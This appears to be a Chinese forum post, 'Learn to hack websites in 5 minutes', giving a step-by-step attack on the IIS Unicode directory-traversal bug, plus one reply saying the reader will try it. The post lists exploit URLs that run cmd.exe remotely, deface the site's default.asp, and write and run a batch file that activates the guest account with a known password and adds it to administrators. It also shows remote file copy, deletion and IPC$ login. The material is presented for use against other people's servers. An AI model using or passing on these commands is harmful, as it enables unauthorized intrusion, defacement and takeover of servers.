1   1  /  1  页   跳转

5分钟学会黑网站

5分钟学会黑网站

-BADBOY编写整理.(我觉得unicode漏洞最好学了~^____^)
  如果对放有unicodi漏洞的话:
  先把c:\winnt\system32\cmd.exe拷贝到了c:\inetpub\scripts\ccc.exe拷贝,cmd.exe(必须改名)方法:http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
  这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe
  通过http://ip/scripts/ccc.exe?/c+dir+c:\可以看到c:\文件。
  我们就可以调用到cmd.exe了,就是说不用那个编码了。http://ip/scripts/ccc.exe?/c+echo+Hack+by+Chinese+>+c:\inetpub\wwwroot\default.asp[url=http://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+]http://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+>;>+c:\inetpub\wwwroot\default.asp[/url]
  主页面就被修改成了:
  HackbyChinese
  1/5/2001
  也就是说,已经把他的主页黑了。
  当然,我们也不能只停留在黑主页的地步,当然想进一步控制整个机器了。
  方法:
  编写.bat执行文件:
  1.打开IE,输入:http://ip/scripts/cmd.exe?/cdir怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
  2.http://ip/scripts/cmd.exe?/cechonetuserguest/active:yes>go.bat
  3.http://ip/scripts/cmd.exe?/cechonetuserguestChinese>>go.bat
  4.http://ip/scripts/cmd.exe?/cechonetlocalgroupadministrators/addguest>>go.bat
  5.http://ip/scripts/cmd.exe?/ctypego.bat看看我们的批文件内容是否如下:
  netuserguest/active:yes
  netuserguestChinese
  netlocalgroupadministrators/addguest
  然后在:http://ip/scripts/go.bat
  在磁盘当前位置执行.
  他的guest密码就是“Chinese”而且是超级用户。
  然后你就可以:netuse\\ip\ipc$"Chinese"/user:"guest"
  其余的net命令在这我就不都说了!
  当然你也可以:
  执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\发现列出了远程主机C:\下的所有文件
  执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\autoexec.bat+c:\autoexec.bak成功实现文件的复制,
  执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del%20c:\autoexec.bak成功实现文件的删除他的guest密码就是“Chinese”而且是超级用户。
  然后你就可以:netuse\\ip\ipc$"Chinese"/user:"guest"
  其余的net命令在这我就不都说了!

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; MAXTHON 2.0)
寻找一个梦想存放年轻时的心,每一个回忆都是走过的成绩!
分享到:
gototop
 

回复:5分钟学会黑网站

有空去试试这个方法
一颗红心向党,一片真心为民
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT